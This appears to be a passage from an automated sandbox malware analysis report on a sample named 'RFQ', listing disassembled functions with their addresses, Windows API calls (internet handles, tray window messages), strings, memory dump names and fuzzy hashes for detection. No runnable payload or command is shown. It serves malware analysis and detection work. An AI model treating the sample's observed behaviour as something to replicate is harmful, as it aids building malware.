                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: htonsinet_addr
                                                                          • String ID: 255.255.255.255
                                                                          • API String ID: 3832099526-2422070025
                                                                          • Opcode ID: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                          • Instruction ID: fb726eff09ff94cff080b531f734a3fd27281744828c6f3d0166551fa69e616e
                                                                          • Opcode Fuzzy Hash: bffbf838f8b6926ef71edb3efae5563a838ccfa537518f0e0f8b175b1623bbd9
                                                                          • Instruction Fuzzy Hash: 5211E732600304ABCF10DF69EC85FAA73A8EF45324F04455BF9049B392D635E4518B59
                                                                          Function 0044256C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 004425F8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: InternetOpen
                                                                          • String ID: <local>
                                                                          • API String ID: 2038078732-4266983199
                                                                          • Opcode ID: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                          • Instruction ID: 93d8b03a482712ff69e4757b1f2b0d1c201104d099b6cd2898bf81ba059b6d15
                                                                          • Opcode Fuzzy Hash: 84bf365b150010c194f632228c20f1475d6fe654e04a12f862fc2198fde258ef
                                                                          • Instruction Fuzzy Hash: 9311C270680710BAF720CB548E62FBA77E8BB24B01F50844BF9429B6C0D6F4B944D7A9
                                                                          Function 004321A4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_memmove
                                                                          • String ID: EA06
                                                                          • API String ID: 1988441806-3962188686
                                                                          • Opcode ID: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                          • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                          • Opcode Fuzzy Hash: e45c56eab20c3bcfe4a359df8a9ba3729120cfe0f4e9d091ae644268b7df8977
                                                                          • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                          Function 00442BB4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove
                                                                          • String ID: u,D
                                                                          • API String ID: 4104443479-3858472334
                                                                          • Opcode ID: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                          • Instruction ID: 1e149f93898fe9afff494952afced4f728167d7c2cca3c00b97e401526751dc1
                                                                          • Opcode Fuzzy Hash: a09dc1741948e98e7df597fac067bc9d4c41fa761799cf9fa5b02ea5b7d8fd51
                                                                          • Instruction Fuzzy Hash: 4FF04C722007045AE3149E6ADC41FD7B7ECDBD8714F50442EF74997241E1B8A9858764
                                                                          Function 004560F2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560FE
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • wsprintfW.USER32 ref: 0045612A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend_mallocwsprintf
                                                                          • String ID: %d/%02d/%02d
                                                                          • API String ID: 1262938277-328681919
                                                                          • Opcode ID: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                          • Instruction ID: 953f6dd97ce98099cbba652085d0304866be84a46252058ffc4865c1a62d2123
                                                                          • Opcode Fuzzy Hash: 0791508f4d5d4d8a4d88f52051df625728301e413c657ab928a68c4181838543
                                                                          • Instruction Fuzzy Hash: 9DF0823274022866D7109BD9AD42FBEB3A8DB49762F00416BFE08E9180E6694854C3B9
                                                                          Function 00442651 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InternetCloseHandle.WININET(?), ref: 00442663
                                                                          • InternetCloseHandle.WININET ref: 00442668
                                                                            • Part of subcall function 004319AC: WaitForSingleObject.KERNEL32(aeB,?,?,00442688,aeB,00002710,?,?,00426561,?,?,0040F19D), ref: 004319BD
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandleInternet$ObjectSingleWait
                                                                          • String ID: aeB
                                                                          • API String ID: 857135153-906807131
                                                                          • Opcode ID: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                          • Instruction ID: 0fa74210230a71b56b5a48e3a0e63043fcf8dca502afcbd281d0c2380f7acdeb
                                                                          • Opcode Fuzzy Hash: c8224cb77d174d98af0e1b6511dcd9cd22ae279780c4dc09588970c0e039578a
                                                                          • Instruction Fuzzy Hash: 46E0E67650071467D310AF9ADC00B4BF7DC9F95724F11482FEA4497650C6B5B4408BA4
                                                                          Function 00441BE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441BFE
                                                                          • PostMessageW.USER32(00000000), ref: 00441C05
                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          • Opcode ID: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                          • Instruction ID: aba4e04af0122a293c2d26b46e7c49f9db856b5fc79b6d6ac13cebee95b63d36
                                                                          • Opcode Fuzzy Hash: 45e518b183cc50fc9cae19d0f51122c68363ee0c98c893ad2541c3bd761d7025
                                                                          • Instruction Fuzzy Hash: EFD0A772BC13013BFA6077745D0FF8B66145B14711F000C3A7B42E61C1D4F8E4018758
                                                                          Function 00441C20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00441C2A
                                                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00441C3D
                                                                            • Part of subcall function 004331A2: Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FindMessagePostSleepWindow
                                                                          • String ID: Shell_TrayWnd
                                                                          • API String ID: 529655941-2988720461
                                                                          • Opcode ID: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                          • Instruction ID: e91d5bd0f3095d95abf168919443ed1e5ef8457e9bc9ee6dadeb2d3358a759b2
                                                                          • Opcode Fuzzy Hash: 2c92ce268d6dea70ed1d9c93ac972332f86dd545b3a9023bb22b3be85c6f7e29
                                                                          • Instruction Fuzzy Hash: 61D0A772B843017BFA6077745D0FF8B66145B14711F000C3A7B46A61C1D4F8D4018758
                                                                          Function 004370C3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004370D1
                                                                            • Part of subcall function 004118DA: _doexit.LIBCMT ref: 004118E6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message_doexit
                                                                          • String ID: AutoIt$Error allocating memory.
                                                                          • API String ID: 1993061046-4017498283
                                                                          • Opcode ID: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                          • Instruction ID: aa36ec6b1cc278624b5c670a1a0522bf80bf1016c56dd6686bcadf549e8ac499
                                                                          • Opcode Fuzzy Hash: a805162a0f5c9c87f8277766c6d2ca4cce7c6123580b1b409358537ccd51af94
                                                                          • Instruction Fuzzy Hash: F1B092323C030627E50437910D0BF9D26003B64F02F220C067324280D204C90090131D